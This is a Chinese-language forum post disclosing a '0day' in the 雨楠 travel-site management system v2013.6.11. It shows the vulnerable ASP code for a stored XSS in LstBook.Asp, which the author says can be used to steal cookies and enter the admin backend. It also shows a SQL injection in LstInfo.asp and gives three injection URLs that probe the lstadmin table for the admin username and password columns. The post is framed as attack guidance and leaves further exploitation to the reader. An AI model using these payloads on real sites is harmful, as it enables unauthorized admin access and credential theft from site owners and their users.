雨楠旅游网服务管理系统 v2013.6.11 最新漏洞0day

漏洞-1 漏洞类型:存储型xss 代码文件:LstBook.Asp 详细代码: [php] ------------------------------------------------ If action="addbook" Then If Trim(Request("xm"))="" Then Call alert("姓名不能为空","-1") End If If Trim(Request("sj"))="" Then Call alert("手机不能为空","-1") End If If Trim(Request("dz"))="" Then Call alert("地址不能为空","-1") End if Set oRs=server.createobject("adodb.recordset") sSql="Select * from [LstBook]" oRs.open sSql,oconn,1,3 oRs.addnew oRs("xm")=Trim(Request("xm")) oRs("sj")=Trim(Request("sj")) oRs("dz")=Trim(Request("dz")) oRs("qq")=Trim(Request("qq")) oRs("email")=Trim(Request("email")) oRs("ly")=Trim(Request("ly")) oRs("time")=now() oRs("state")=0 oRs.update oRs.close Call Alert("您的留言提交成功,我们将尽快给您解答。","/lstbook.asp") Set oRs = Nothing [/php] -------------------------------------------------------------- 利用说明:以上代码都只是用trim过滤了空格而已,所以.....呵呵 可以利用此xss截取cookie进后台! 漏洞-2 漏洞类型:sql注入 代码文件:LstInfo.asp 详细代码: ------------------------------------------------ [php] <% If Id="" Then Call alert("参数错误,返回首页.","/") End If '本页 Set v= oConn.Execute("SELECT top 1 * FROM [LstJob] where Id ="&Id) If v.bof And v.eof Then Call BackUrl("/") End If oConn.Execute("UPDATE [LstJob] SET Jobhits = Jobhits +1 where Id ="&Id) [/php] 代码说明:ID变量在“”文件里面,而在conn.asp文件里面ID是用Request来获取的~!!!这样就很明显了~! PS:下面列举3条基本测试语句。其他的自行解决! /LstJobInfo.asp?TT=&SS=&Id=1 and exists(select * from lstadmin) /LstJobInfo.asp?TT=&SS=&Id=1 and exists(select usradmin from lstadmin) /LstJobInfo.asp?TT=&SS=&Id=1 and exists(select usrpass from lstadmin)

发表评论